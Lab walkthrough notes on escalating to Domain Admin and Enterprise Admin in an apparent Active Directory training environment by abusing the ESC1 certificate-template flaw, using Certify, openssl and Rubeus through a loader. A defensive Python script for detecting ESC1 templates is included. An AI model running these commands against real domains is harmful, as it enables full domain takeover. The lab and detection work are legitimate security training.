We can start by using the Certify tool to enumerate the certificate authorities (AD CS) in moneycorp:
C:\AD\Tools\Certify.exe cas
We can list all the templates using the following command. Going through the output, we can find some interesting templates:
C:\AD\Tools\Certify.exe find
[snip]
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
[snip]
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[snip]
Now that we have identified the templates that look interesting, we can attempt privilege escalation to DA and EA using ESC1.
The HTTPSCertificates template stands out because it allows the requestor to supply the subject name. Let's get some more information about it:
C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
What this means is that the HTTPSCertificates template grants enrollment rights to the RDPUsers group and allows the requestor to supply the Subject Name. Recall that student613 is a member of the RDPUsers group. This means that, as student613, we can request a certificate for any user.
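As an added example (not part of the original notes and not code from the Certify project), here is a small Python audit that parses Certify's flattened `find` output in the form shown above and flags templates meeting every ESC1 precondition: ENROLLEE_SUPPLIES_SUBJECT, no manager approval, no authorized signatures required, an EKU usable for authentication, and enrollment rights granted to a broad group. The sample output and the RDPUsers SID are constructed, and the baseline set of broad groups is an assumption the auditor extends for their own environment (here, RDPUsers).

```python
import re

# Constructed sample in the flattened layout of the Certify find output above; the RDPUsers SID is a placeholder.
SAMPLE_FIND_OUTPUT = r"""CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
pkiextendedkeyusage : Certificate Request Agent
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-3726368948-3917688648-513
Template Name : HTTPSCertificates
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
Enrollment Rights : dcorp\RDPUsers S-1-5-21-0-0-0-1106"""

# EKUs usable for authentication; a template with no EKU at all also qualifies.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}
# Assumed baseline of broad groups; extend it with environment-specific ones such as RDPUsers.
BROAD_GROUPS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def parse_templates(text):
    """Split flattened 'Certify.exe find' output into one dict per template."""
    templates, current = [], None
    for line in text.splitlines():
        if ":" not in line:
            continue  # section labels such as 'Permissions' carry no value
        key, _, value = line.partition(":")
        key, value = key.strip().lower(), value.strip()
        if key == "template name":
            current = {"name": value, "enrollment rights": []}
            templates.append(current)
        elif current is None:
            continue  # CA header lines precede the first template
        elif key == "enrollment rights":
            current["enrollment rights"].append(re.sub(r"\s+S-1-\S+$", "", value))  # keep 'domain\group', drop SID
        else:
            current[key] = value
    return templates

def is_esc1(t, broad_groups=BROAD_GROUPS):
    """True when a parsed template meets every ESC1 precondition."""
    ekus = {e.strip() for e in t.get("pkiextendedkeyusage", "").split(",") if e.strip()}
    return ("ENROLLEE_SUPPLIES_SUBJECT" in t.get("mspki-certificates-name-flag", "")
            and "PEND_ALL_REQUESTS" not in t.get("mspki-enrollment-flag", "")  # no manager approval
            and t.get("authorized signatures required", "0") == "0"
            and (not ekus or bool(ekus & AUTH_EKUS))
            and any(p.split("\\")[-1] in broad_groups for p in t["enrollment rights"]))

def esc1_findings(text, broad_groups=BROAD_GROUPS):
    return [t["name"] for t in parse_templates(text) if is_esc1(t, broad_groups)]
```

With only the default baseline groups nothing is flagged; adding RDPUsers to the set reports HTTPSCertificates, while the Certificate Request Agent template is correctly left out because it is an ESC3-style finding rather than ESC1.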
Now we can try to request a certificate for the Domain Admin, Administrator:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator
Now let's copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem:
notepad C:\AD\Tools\esc1.pem
We need to convert it to PFX to use it. Use the openssl binary on the student VM to do that. I will use SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
Let's start by encoding "asktgt" (the encoded value is referenced as %Pwn% in the command that follows), then use the certificate to request and inject a TGT:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc1-DA.pfx /password:SecretPass@123 /ptt
Now we can check if we actually have DA privileges:
We can use a similar method to escalate to Enterprise Admin privileges. Request a certificate for the Enterprise Administrator, Administrator:
C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator
Save the certificate to esc1-EA.pem and convert it to PFX. I will use SecretPass@123 as the export password:
C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx
Encode asktgt and run the following command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:esc1-EA.pfx /password:SecretPass@123 /ptt
And check for EA privileges:
winrs -r:mcorp-dc cmd /c set username
Need to revisit this process later on.
Now let's try privilege escalation to DA and EA using ESC3.